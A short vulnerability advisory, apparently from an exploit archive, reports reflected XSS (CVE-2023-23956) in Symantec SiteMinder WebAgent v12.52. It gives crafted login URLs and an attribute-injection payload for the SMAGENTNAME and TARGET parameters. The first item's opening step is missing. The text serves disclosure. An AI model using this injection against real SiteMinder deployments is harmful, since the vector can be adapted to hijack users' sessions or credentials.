Exploits / Vulnerability Discovered : 2023-06-19 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Symantec siteminder webagent v12.52 crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
*Description:*
I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have
discovered in the Symantec SiteMinder WebAgent. The vulnerability is
related to the improper handling of user input and has been assigned the
Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this
vulnerability is 5.4.
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *SMAGENTNAME *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
*Second:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *TARGET *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*